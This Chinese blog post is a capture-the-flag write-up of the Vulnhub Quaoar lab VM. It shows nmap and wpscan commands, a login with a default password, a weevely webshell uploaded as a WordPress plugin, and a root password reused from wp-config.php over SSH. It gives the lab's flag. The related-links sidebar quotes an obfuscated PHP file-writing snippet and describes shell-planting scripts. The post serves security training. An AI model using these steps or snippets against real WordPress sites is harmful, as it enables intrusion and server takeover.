Vulnhub 靶机 Quaoar write up wordpresscms 漏洞利用上传插件 getshell wp-config 获取到数据库账号密码 用于ssh登录提权

已于 2022-02-11 11:43:43 修改
阅读量2.3k 收藏 4
点赞数 2
分类专栏: 靶机学习 文章标签: linux 安全 运维
于 2021-12-29 19:50:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/122220120
版权
这篇博客介绍了如何对名为Quaoar的靶机进行渗透测试,首先通过nmap探测IP和端口,发现WordPress CMS,并利用弱口令和上传插件漏洞获取webshell。接着通过wp-config.php找到数据库中的root密码,最终使用SSH登录实现提权。整个过程展示了渗透测试的基本步骤和技术。
摘要由CSDN通过智能技术生成

0x00 环境搭建

  • 下载地址
    https://download.vulnhub.com/hackfest2016/Quaoar.ova
  • 运行环境
    Virtual Box 仅主机网络
    kali 搭建同网卡
  • 目标
    root权限 flag文件

0x01 信息收集

  • 靶机ip探测

      nmap -sP 192.168.56.0/24

192.168.56.109
在这里插入图片描述

  • 端口服务探测识别

       nmap -sC -sV -A -p- 192.168.56.109 -o port.txt

22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.8.1-P1

80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
110/tcp open pop3 Dovecot pop3d

139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
445/tcp open netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open ssl/imaps?
995/tcp open ssl/pop3s?

Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5

在这里插入图片描述

0x02 漏洞挖掘

  • 先以80 web为 入口点测试

步骤一:80端口web测试

(1)网站首页只有一张图片 没有任何功能点
在这里插入图片描述
(2)robots.txt 查看 目录扫描
在这里插入图片描述
之后就可以转为 wordpress cms漏洞利用

步骤二:wordpress cms漏洞利用

版本 在这里插入图片描述

(1)wpscan --url http://192.168.56.109/wordpress --wp-content-dir wp-content --enumerate u

发现两个用户 admin 和wpuser
在这里插入图片描述
(2)尝试登录后台
http://192.168.56.109/wordpress/wp-login.php
admin admin 弱口令登录成功

通过在插件上传木马 getshell

(1)
在这里插入图片描述
(2)kali 工具

	weevely generate shell back.php

在这里插入图片描述

在这里插入图片描述
(3)上传后的插件都存在于 wp-content-uploads 目录
在这里插入图片描述
(4) kali 工具 连接木马

weevely http://192.168.56.109/wordpress/wp-content/uploads/2021/12/back.php shell

在这里插入图片描述

0x03 提权

步骤三:提权

(1)由于是 wordpress 先去网站根目录查看 数据库文件
wp-config.php
可能存在root密码
在这里插入图片描述
(2)尝试ssh登录
在这里插入图片描述
登录成功

MD5解密 flag为

QuaoarIsAwesome
Quaoar太棒了

0x04 总结

该靶机比较简单,利用wordpress 弱口令进入后台后,利用上传插件漏洞getshell,之后再wp-config.php 数据库配置文件中 看到个root和密码 尝试 ssh登录提权成功。

LuckyCharm~
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUGKU WP-getshell
m0_55631425的博客
06-20 550
蚁剑连接 linux主机,putenv=on,用LD_PRELOAD方法绕过 注意windows无法使用该插件,建议上虚拟机 附赠蚁剑插件市场打不开的解决办法: http://mp.weixin.qq.com/s?__biz=MzI0MDI5MTQ3OQ==&mid=2247484036&idx=1&sn=9ee9156e63b8f17c147fc0c05be69027&chksm=e91c597cde6bd06a7abdec4ad9cf3d275530af3bdc069..
66.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。第1页 共25页
WordPress Get Shell
weixin_34221073的博客
12-11 174
WordPress3.0后台404页面可以自定义 “外观”-“编辑”-“404模板 <script language="php">fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(101).chr(11...
一步一步拿下WordPress网站
最新发布
qq_62987084的博客
06-22 608
WordPress网站 渗透测试 实验流程
AdmX_new(Wordpress getshell & 二次提权
weixin_46591320的博客
11-26 1304
Wordpress getshell
Vulnhub靶机Quaoar渗透
xingjinhao123的博客
02-25 565
靶机介绍 官方下载地址:https://www.vulnhub.com/entry/hackfest2016-quaoar,180/ 通过官方介绍知道了一共有三个flag 运行环境: 靶机:网络连接方式设为NAT模式,IP地址:192.168.174.132 攻击机:通网段下的kali linux,IP地址:192.168.174.128 开始渗透 运行靶机 靶机运行之后就提示了IP地址 扫描端口 看到有很多端口,先访问80看一下,是两张图片F12查看源代码也没有发现 扫一目录,看到了熟悉的wor
VulnHub渗透测试实战靶场 - HACKFEST2016: QUAOAR
LYJ20010728的博客
08-07 673
VulnHub渗透测试实战靶场 - HACKFEST2016: QUAOAR环境下载HACKFEST2016: QUAOAR靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 HACKFEST2016: QUAOAR靶机搭建 具体步骤参考VirtualBox(Host only)和VMware共用同一虚拟网卡 将下载好的靶机环境,导入VritualBox,设置为Host-Only模式 将VMware中桥接模式网卡设置为VritualBox的Host-only 目标
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
【网络安全自学篇】六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1 本文主要讲述了网络安全中的靶机渗透技术,特别是通过Vulnhub平台进行环境搭建和JIS-CTF挑战。Vulnhub是一个提供虚拟机...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
wordpress-getshell
06-05
Wordpress GetShell - 公共版 使用有效的用户名和密码组合,下面的脚本演示了如何自动植入 PHP shell 示例用法 %> perl wp-getshell.pl http://ubuntu64/wordpress admin admin [+] Logged in, replacing cookies [+] Now looking for editor [+] Editor found, old content length 48 [+] Building forms --> _wpnonce with value 09f8f3fb95 --> file with value 404.php --> _wp_http_referer with value /wordpress/wp-admin/theme-editor.php?file=4
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
[视频]K8飞刀 WordPress XSS添加管理员 & GetShell 教程-附件资源
03-05
[视频]K8飞刀 WordPress XSS添加管理员 & GetShell 教程-附件资源
记一次菜鸡的低级折腾--WordPress get Webshell(后台文件编辑插马)
weixin_30908941的博客
03-13 1059
挺简单的一个测试站,开始思路错了,一直去网上找WordPress漏洞,看有没有什么能利用的,未果,因为这个测试站有些地方并不完善,有的漏洞利用不了,菜鸡的我连弱口令都没猜对,没知识就是这么悲哀。 下面记录一下全过程。。。。 1、wpscan扫描(毫无卵用的步骤) 扫描到主题:twentyseventeen 但是并没有插件: 扫描一下主...
wordpress 3.0-3.9.2 XSS Getshell Payload(可Getshell当前模板也可以是全部插件模板)
收集盒 Book box
12-14 1180
0x_Jin 如果实战用记得把 console.lnfo 那一行该为发送喔。。。 密码:fuckxssQ 这个getshell js 有getshell当前模板跟getshell全部模板的功能 默认是getshell当前模板   StartGetshell = 0 如果要getshell全部插件模板 把 StartGetshell的值改为1 即可 /* 0x_Jin Word
WORDPRESS后台拿SHELL的方法
cnbird's blog
12-17 5164
WORDPRESS后台拿SHELL的方法
靶机Quaoar
AzVoidSUN的博客
06-23 728
运行环境 本靶机提供了OVA格式的镜像,官方推荐使用virtualbox,从Vulnhub下载之后,导入到viirtualbox即可运 行。 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 本靶机的渗透目标为渗透进靶机,找到flag,并拿到root权限。 开始 首先查看本机ip 192.168.1.25 nmap扫一下网段 发现主机 访问下80端口 扫描下目录 发现后台登陆的地方 弱口令admin登陆成功 点击修改404界面 我直接把php反弹she
Vulnhub 靶机 Stapler write up samba+wp advanced-video ->mysql 密码 连接 john解密 登录后台 wp插件getshell sudo提权
YouthBelief的博客
12-09 2003
Stapler write up0x00 靶机搭建0x01 信息收集0x02 漏洞挖掘web思路mysql 思路ftp 思路139 samba思路步骤一:ftp匿名访问步骤二:samba139测试步骤三:web渗透 80步骤四:web渗透12380端口 0x00 靶机搭建 Virtual box 导入虚拟机启动 网卡设为 host-only 0x01 信息收集 ip探测 要渗透靶机 需要知道目标ip地址 用 nmap 探测 -sP ping 探测 nmap -sP 192.168.56.0/24 19
Vulnhub靶机渗透环境搭建及JIS-CTF入门实践
本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权获取5个flag。 一、Vulnhub简介 Vulnhub是一个开源的渗透测试平台,提供了多种类型的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值